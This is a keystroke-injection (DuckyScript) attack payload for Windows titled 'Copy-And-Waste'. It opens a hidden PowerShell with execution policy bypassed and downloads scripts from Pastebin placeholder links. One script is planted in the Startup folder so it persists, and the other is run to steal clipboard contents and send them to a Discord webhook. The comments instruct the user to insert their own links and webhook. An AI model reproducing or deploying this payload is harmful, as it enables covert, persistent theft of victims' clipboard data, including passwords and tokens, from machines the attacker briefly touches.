REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 200 STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like